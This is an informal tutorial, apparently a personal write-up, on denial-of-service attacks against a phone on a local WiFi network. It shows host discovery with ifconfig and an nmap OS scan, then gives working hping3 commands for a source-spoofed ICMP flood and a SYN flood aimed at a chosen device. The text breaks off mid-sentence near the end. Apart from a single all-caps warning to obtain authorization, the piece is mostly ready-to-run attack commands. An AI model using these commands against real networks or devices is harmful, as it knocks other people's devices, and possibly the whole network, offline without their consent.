hping3

Using hping3 to conduct a DoS attack on a phone's wireless(WiFi) connection:

First, I need to enumerate the active devices on the local network

$ ifconfig

...

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.117  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::80d5:9681:4291:d03f  prefixlen 64  scopeid 0x20<link>
        ether 38:68:93:41:54:10  txqueuelen 1000  (Ethernet)
        RX packets 119716  bytes 167593185 (159.8 MiB)
        RX errors 0  dropped 1  overruns 0  frame 0
        TX packets 39879  bytes 4895980 (4.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

...

I am connected to the network using my Laptop's wifi card(wlan0)

the second line gives us all the information we need-local IP address, netmask and broadcast address

The aim of this is to avoid collecting information on and trying to attack your own connection

We will use the subnet mask and local IP address to craft and scan a range of possible IP addresses on the network. I used nmap here to run an OS detection swab of this range with-

# nmap  -O 192.168.0.0-255

(you could do a ping scan with (-sn) and then attempt OS detection manually for hosts you are interested in)

I will not paste the output of the scan here, but I found the host I want to target-192.168.0.192

Now is where the fun begins. I will use hping3 and use source-IP spoofing to create a DoS, after deciding what options to use

# hping3 -1 --flood --interface wlan0 -a 192.168.0.192 x.x.x.x --rand-dest

WARNING! OBTAIN AUTHORIZATION BEFORE TRYING OUT ANY SORT OF DoS!

ICMP ATTACKS CONSUME BANDWIDTH AND THIS CAN CAUSE A DoS FOR ALL DEVICES ON THE NETWORK

A more targeted attack is a SYN flood attack. We can attempt to DoS a target device or service with substantially less traffic than other DoS attacks

-S specifies SYN (of the TCP/IP handshake)

# hping3 -S --flood -V 192.168.0.192

This

-p 443